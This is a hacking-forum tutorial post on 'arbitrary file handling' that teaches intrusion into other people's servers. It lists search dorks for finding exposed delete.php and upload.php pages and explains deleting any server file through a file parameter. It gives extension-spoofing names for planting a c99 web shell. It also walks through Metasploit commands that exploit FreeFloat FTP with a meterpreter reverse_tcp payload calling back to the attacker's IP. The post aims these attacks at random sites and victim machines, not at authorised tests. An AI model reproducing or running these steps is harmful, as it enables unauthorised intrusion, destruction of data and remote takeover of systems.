Jump to content
MaxCheaters Official Group at Discord
--> Place your ad text here <--

[Tutorial] Arbitrary File Handling

The High Roller
 Share

Recommended Posts

The High Roller Newbie

The High Roller

Posted
Posted

 

 

Introduction

 

Let's start off with the definition. An arbitrary file is any file on a specific server or system. Basically, the arbitrary file is a file that allows you to modify everything on a system. For example, if you got access to a particular website part of a shared server and you manage to root it, the files from the "box" are arbitrary - those on the site itself are not.

 

Now, we can have only a limited number of actions handling arbitrary files. Those are the three following:

 

[*] Arbitrary File Deletion

[*] Arbitrary File Overwriting

[*] Arbitrary File Uploading

 

Arbitrary File Deletion

 

Such method is most usually implemented on websites that lack directory access permissions or do not have any at all. In that case, the hacker can easily directly access the page for file deletion. It is most usually used for random websites, since exploring a targeted website could take quite a lot of time in order to find the path (if, of course, you don't already have the server-side files).

 

I've posted some dorks for arbitrary file deletion below:

 

inurl:"delete.php?file=" ext:php
inurl:"delete?filename=" ext:php
inurl:"delete.aspx?file=" ext:php
inurl:"action=delete?file=" ext:php

 

Let's say, we've found a website

 

F3jvQ.png

 

We can see in the URL the directory of ../delete.php?file=

In our case the target for deletion is a person's information board. It is just encoded in Base64 for some reason and resolves to the following string:

 

/www/egypt3/data/peop/Selvia,+John+and+Lisa/phone1

 

We may use this parameter to delete any file on the server that is hosted on this particular website as long as we are aware of the full path or manage to exploit a directory disclosure vulnerability.

 

Arbitrary File Upload

 

Get about some dork and find an uploading script.

 


inurl:"upload.php?file=" ext:php
inurl:"upload?filename=" ext:php
inurl:"upload.aspx?file=" ext:php
inurl:"action=upload?file=" ext:php






 



This is how my target looks like. A simple upload page (possibly without any filtration upon user input).


 



6Ev7N.jpg


 



Try and upload your shell directly. If not successful, spoof the extension to one of these using the null byte:


 









shell.php;.jpg

shell.php..jpg

shell.php.jpg;

shell.php.jpg:;

shell.php.jpg%;

shell.php.jpg%00

shell.php%00.jpg

shell.php.jpg;%00

shell.php.jpg%00:;










 



and upon uploading, tamper the POST request with Tamper Data (this has been covered on a lot of tutorials, and you could really easily search for it rather than me explaining it over and over again) so as to change the extension back to what it really is (.php).


 



tg9Fi.jpg


 



Whoops, we've got our c99 uploaded on their server. If that method of uploading did not work for you, try using a binder and spoof the extension properly.


 



FreeFloat FTP


 



I decided to put up a basic example of a windows exploitation through Metasploit using a public exploit. We gonna use FreeFloat FTP exploit to upload an Arbitrary File on a server. The exploit usage is the following:


 



This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.


 









$ msfconsole


msf > use exploit/windows/ftp/freefloatftp_wbem

msf exploit(freefloatftp_wbem) > show payloads

msf exploit(freefloatftp_wbem) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(freefloatftp_wbem) > set LHOST [MY IP ADDRESS]

msf exploit(freefloatftp_wbem) > set RHOST [TARGET IP]

msf exploit(freefloatftp_wbem) > exploit










 



Set/Define the payload


 



YX5xj.jpg


 



Define the localhost [LHOST]. You can view your IP address with ifconfig under your network interface (most usually eth1), next to inet addr.


 



bmY3E.jpg


 



Define the Remote Host [RHOST]. Just the IP address of the windows victim machine.


 



rYmh2.jpg


 



Now type 


exploit




 (how ironic) and the payload should be delivered successfully.


 



That's all about Arbitrary Files I managed to think of. Leave a comment and hope you learnt something! :pirate:


 





			
		


		

		
			

		
	


	

	





	
Link to comment

	
		
	
	
	

	
	
Share on other sites

	

	


	

	

	






	




					
					
					
				
			
			



		

	


	
	
	
	
	
		
	

			
				
				



	
	
		

			
Please sign in to comment

			
You will be able to leave a comment after signing in

			

			

			Sign In Now
		

	


			
		

	

	
		

			

				
					


    
          Share
    

    

        
        
            

            
        
    


				
				
                

                




				
			

		

	







	

		
			
				Go to topic listing
			
		
	

	




								


							

							


	

		
		
		
			
			


		
		


	

		
	


	


						

					

					
				

				

			

		

			

				

				
			

		

		



	

		×
		


    
	





			
				

					
				

			

			

			

			
		

	






	

		×
		

			
    
				
  • Create New...
    •